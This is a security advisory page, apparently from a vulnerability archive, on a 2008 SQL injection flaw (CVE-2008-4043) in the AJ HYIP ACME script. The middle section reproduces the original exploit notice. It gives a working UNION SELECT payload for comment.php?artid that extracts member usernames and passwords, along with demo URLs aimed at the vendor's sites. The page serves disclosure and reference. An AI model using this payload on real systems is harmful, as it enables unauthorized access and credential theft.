AJ HYIP ACME (comment.php artid) SQL Injection Vulnerability

2008-09-13 / 2008-09-14
Credit: security fears team
Risk: High
Local: No
Remote: Yes
CVE: CVE-2008-4043
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

### proud to be muslim ### ### ### rEm0te sql injction VulnErability ### ### ### ### (ajhyip manager script) ### ### ### ### ### AuTh0r : security fears team ### ### ### ### Home : WwW.alsonaa.com ### ### ### ### members: HeB4RieH , germaya_x ### ### ### ### ### Script Name : ajhyip ### ### ### ### download : http://www.ajhyip.com/ ### ### ### ### Email : s-fteam@securityfears.cc ### ### ### d0rk :: "use your mind" ### ### (you can log to control panel from http://site.com login.php) ### ### ### ### -(:: sql Code ::)- ### ### comment.php?artid=(sql) ### ###(sql)=5+union+select+1,concat_ws(0x3a3a,username,password),3,4,5,6,7,8,9+from+members/* ### ### ### ### ### -(:: l!ve demo ::)- ### ### ### ###http://www.ajhyip.com/demo/prime/article/comment.php?artid=5+union+select+1,2,3,4,concat_ws(0x3a3a,username,password),6,7,8,9+from+members/* ### ### ###http://www.ajhyip.com/demo/acme/article/comment.php?artid=5+union+select+1,2,3,4,concat_ws(0x3a3a,username,password),6,7,8,9+from+members/* -(:: !GreTzZ! ::)- ::SnIpEr.KiLLeR::fa6al error::black cheetah::members of alsonaa.com::str0ke::MusliMs HaCkErs::

References:

http://xforce.iss.net/xforce/xfdb/44803
http://www.securityfocus.com/bid/30974
http://www.milw0rm.com/exploits/6350


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top